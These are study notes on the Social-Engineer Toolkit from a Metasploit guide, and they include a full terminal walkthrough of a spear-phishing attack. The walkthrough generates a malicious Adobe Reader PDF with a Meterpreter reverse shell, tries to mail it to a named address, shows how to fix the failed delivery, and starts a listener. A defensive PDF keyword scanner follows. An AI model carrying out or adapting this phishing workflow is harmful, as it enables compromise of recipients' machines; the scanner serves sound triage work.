Notes on "Metasploit: The Penetration Tester's Guide" (12)

From the column: Antenna's Linux operations notes

10. The Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) is a software package developed for release alongside the Social-Engineer.org website. The site social-engineer.org collects tutorials, technical descriptions, terminology and the groundwork for related approaches to social engineering, to help you master techniques that target the way people think, rather than the way software fails.

An attack vector is the channel used to obtain information or to gain access to an information system. SET classifies its attacks by attack vector (for example web-based attacks, e-mail-based attacks and USB-based attacks).

1. Configuring SET

My Kali 2018 probably differs from the version used in the book, so I am not recording this part for now.

2. Spear-phishing attack vector

root@kali:/# setoolkit
[-] New set.config.py file generated on: 2018-09-27 09:12:17.319978
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2018-09-27 09:12:17.319978
[*] SET is using the new config, no need to restart

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Version: 7.7.9 [---]
[---] Codename: Blackout [---]
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] Homepage: https://www.trustedsec.com [---]

Welcome to the Social-Engineer Toolkit (SET). The one stop shop for all of your SE needs.
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com
Its easy to update using the PenTesters Framework! (PTF)
Visit https://github.com/trustedsec/ptf to update all your tools!

Select from the menu:
 1) Social-Engineering Attacks
 2) Penetration Testing (Fast-Track)
 3) Third Party Modules
 4) Update the Social-Engineer Toolkit
 5) Update SET configuration
 6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit

set> 1

Select from the menu:
 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) Wireless Access Point Attack Vector
 8) QRCode Generator Attack Vector
 9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.

set> 1

The Spearphishing module allows you to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure "Sendmail" is installed (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy!

 1) Perform a Mass Email Attack
 2) Create a FileFormat Payload
 3) Create a Social-Engineering Template
99) Return to Main Menu

set:phishing>1
/usr/share/metasploit-framework/
Select the file format exploit you want. The default is the PDF embedded EXE.

********** PAYLOADS **********
 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
 2) SET Custom Written Document UNC LM SMB Capture Attack
 3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
 4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
 5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
 6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
 7) Adobe Flash Player "Button" Remote Code Execution
 8) Adobe CoolType SING Table "uniqueName" Overflow
 9) Adobe Flash Player "newfunction" Invalid Pointer Use
10) Adobe Collab.collectEmailInfo Buffer Overflow
11) Adobe Collab.getIcon Buffer Overflow
12) Adobe JBIG2Decode Memory Corruption Exploit
13) Adobe PDF Embedded EXE Social Engineering
14) Adobe util.printf() Buffer Overflow
15) Custom EXE to VBA (sent via RAR) (RAR required)
16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
17) Adobe PDF Embedded EXE Social Engineering (NOJS)
18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
19) Apple QuickTime PICT PnSize Buffer Overflow
20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
21) Adobe Reader u3D Memory Corruption Vulnerability
22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>10

 1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
 2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
 3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
 4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
 5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
 6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
 7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2
set> IP address or URL (www.ex.com) for the payload listener (LHOST) [192.168.1.210]:
set:payloads> Port to connect back on [443]:
[-] Defaulting to port 443...
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Payload creation complete.
[*] All payloads get sent to the template.pdf directory
[*] If you are using GMAIL - you will need to need to create an application password: https://support.google.com/accounts/answer/6010255?hl=en
[-] As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of template.whatever

Do you want to rename the file?
example Enter the new filename: moo.pdf

 1. Keep the filename, I dont care.
 2. Rename the file, I want to be cool.

set:phishing>1
[*] Keeping the filename and moving on.

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would be to send an email to one individual person. The second option will allow you to import a list and send it to as many people as you want within that list.

What do you want to do:
 1. E-Mail Attack Single Email Address
 2. E-Mail Attack Mass Mailer
99. Return to main menu.

set:phishing>1

Do you want to use a predefined template or craft a one time email template.
 1. Pre-Defined Template
 2. One-Time Use Email Template

set:phishing>1
[-] Available templates:
 1: Status Report
 2: How long has it been?
 3: Order Confirmation
 4: WOAAAA!!!!!!!!!! This is crazy...
 5: Strange internet usage from your computer
 6: New Update
 7: Baby Pics
 8: Computer Issue
 9: Have you seen this?
10: Dan Browns Angels & Demons

set:phishing>2
set:phishing> Send email to:lilyef2000@163.com

 1. Use a gmail Account for your email attack.
 2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: moo@example.com):xxxxxx@163.com
set:phishing> The FROM NAME user will see:xxxxxx
set:phishing> Username for open-relay [blank]:
Password for open-relay [blank]:
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:no
set:phishing> Does your server support TLS? [yes|no]:no
[!] Unable to deliver email. Printing exceptions message below, this is most likely due to an illegal attachment. If using GMAIL they inspect PDFs and is most likely getting caught.
Press {return} to view error message.
(553, authentication is required,163 smtp2,DNGowACn_zFc2Kxb7l0tAA--.106S5 1538054240, lilyef2000@163.com)
[*] SET has finished delivering the emails
set:phishing> Setup a listener [yes|no]:yes

       =[ metasploit v4.17.14-dev                         ]
+ -- --=[ 1809 exploits - 1030 auxiliary - 313 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing /root/.set//meta_config for ERB directives.
resource (/root/.set//meta_config)> use exploit/multi/handler
resource (/root/.set//meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/root/.set//meta_config)> set LHOST 192.168.1.210
LHOST => 192.168.1.210
resource (/root/.set//meta_config)> set LPORT 443
LPORT => 443
resource (/root/.set//meta_config)> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource (/root/.set//meta_config)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set//meta_config)> exploit -j
[*] Exploit running as background job 0.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 192.168.1.210:443
msf exploit(multi/handler) >

Two things have to be true for this run to work. First, the target must have an old, vulnerable version of Adobe Reader installed: payload 10 (Adobe Collab.collectEmailInfo buffer overflow) only fires in the Reader releases that carried that bug, and a current Reader simply ignores the attachment. Second, the environment has to be set up correctly, which is where the run above fails: option 2 ("your own server or open relay") was chosen, but smtp.163.com is a provider mail server, not an open relay, so with the username and password left blank and TLS answered "no" it rejected the message with SMTP 553 "authentication is required". SET's own hint that the attachment was "illegal" is misleading here; the server never got as far as inspecting it. Supplying the account credentials (and, for most providers, answering yes to TLS) would get the message accepted, after which the listener started by the resource script (exploit/multi/handler on 192.168.1.210:443, ExitOnSession false) waits for the Meterpreter connect-back.
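The file-format payloads in the list above (Collab.collectEmailInfo, util.printf, getIcon, PDF Embedded EXE, JBIG2Decode and so on) only do anything if the victim's reader processes the JavaScript, embedded file, launch action or malformed stream inside the attachment, so the same features are what a defender looks for when triaging a suspicious PDF. The script below is an added example, not code from the book or from SET: a small static scanner that counts those PDF names, resolving hex-escaped names (/J#61vaScript) and looking inside FlateDecode streams so that the usual obfuscation does not hide them. The keyword list, the reasons attached to each key and the constructed sample PDF are my own; the sample is harmless and contains no exploit.

```python
import re
import sys
import zlib

# Added example (not from the book or SET): PDF names that SET's file-format
# payloads rely on, with a short reason for flagging each. My own selection.
SUSPICIOUS_KEYS = {
    b"/JavaScript":   "JavaScript object (Collab.*, util.printf, getIcon style exploits)",
    b"/JS":           "JavaScript action or script reference",
    b"/Launch":       "Launch action (asks the reader to run an external program)",
    b"/EmbeddedFile": "embedded file (PDF Embedded EXE payload)",
    b"/OpenAction":   "action fired when the document is opened",
    b"/AA":           "additional actions fired automatically",
    b"/JBIG2Decode":  "JBIG2 image stream (JBIG2Decode memory corruption)",
    b"/RichMedia":    "Flash / rich-media annotation (Flash Player exploits)",
}


def _inflate_streams(data):
    """Concatenate every stream body that inflates cleanly with zlib, so that
    keywords stored inside FlateDecode objects are visible to the keyword scan."""
    inflated = []
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate-compressed or truncated; raw bytes are scanned anyway
    return b"\n".join(inflated)


def _unescape_names(data):
    """Resolve PDF name hex escapes such as /J#61vaScript -> /JavaScript, a
    common trick for hiding keywords from naive string matching."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf_bytes(data):
    """Return {name: (count, reason)} for every suspicious PDF name found."""
    if not data.startswith(b"%PDF"):
        raise ValueError("missing %PDF header")
    haystack = _unescape_names(data + b"\n" + _inflate_streams(data))
    findings = {}
    for key, reason in SUSPICIOUS_KEYS.items():
        # The lookahead stops /JS matching /JSomething and /AA matching /AAA.
        count = len(re.findall(re.escape(key) + rb"(?![A-Za-z0-9])", haystack))
        if count:
            findings[key.decode()] = (count, reason)
    return findings


def build_sample_pdf():
    """Constructed, harmless sample (no exploit): a PDF whose OpenAction runs
    JavaScript kept in a Flate-compressed stream, the general shape of the
    JavaScript-based file-format payloads in SET's menu."""
    script = zlib.compress(b"app.alert('constructed sample, no exploit here');")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /S /J#61vaScript /JS 4 0 R >>",  # hex-escaped name on purpose
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(script)
        + script + b"\nendstream",
    ]
    pdf = b"%PDF-1.4\n"
    for num, body in enumerate(objects, start=1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


if __name__ == "__main__":
    # With a path argument, scan that file; otherwise scan the constructed sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pdf()
    for name, (count, reason) in sorted(scan_pdf_bytes(data).items()):
        print("%-14s x%d  %s" % (name, count, reason))
```

Run it against the template.pdf SET generates (python3 scan.py template.pdf) and it reports the JavaScript, OpenAction and embedded-file markers the chosen payload put there; a clean document with none of these names is not proof of safety (the CoolType and U3D payloads corrupt font and mesh data rather than using actions), but any hit on /Launch, /EmbeddedFile or /JS in an unsolicited attachment is reason to open it only in a sandbox.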

3. Web attack vectors

(1) Java applet

(2) Client-side web attacks

(3) Username and password harvesting

(4) Tabnabbing

(5) Man-in-the-middle attack

(6) Web jacking

(7) Combining several attack methods (multi-attack)

4. Infectious media generator

5. USB HID attack vector

6. Other SET features

7. Looking ahead

Tools like SET are extremely useful to an attacker, but as a professional penetration tester you must always remember that your technical ability rests on creativity and on how well you handle difficulty and challenge. SET can help you attack a target, but in the end, if you fail, it is most likely because you lacked enough creativity of your own.



Tags: penetration testing | information security | network security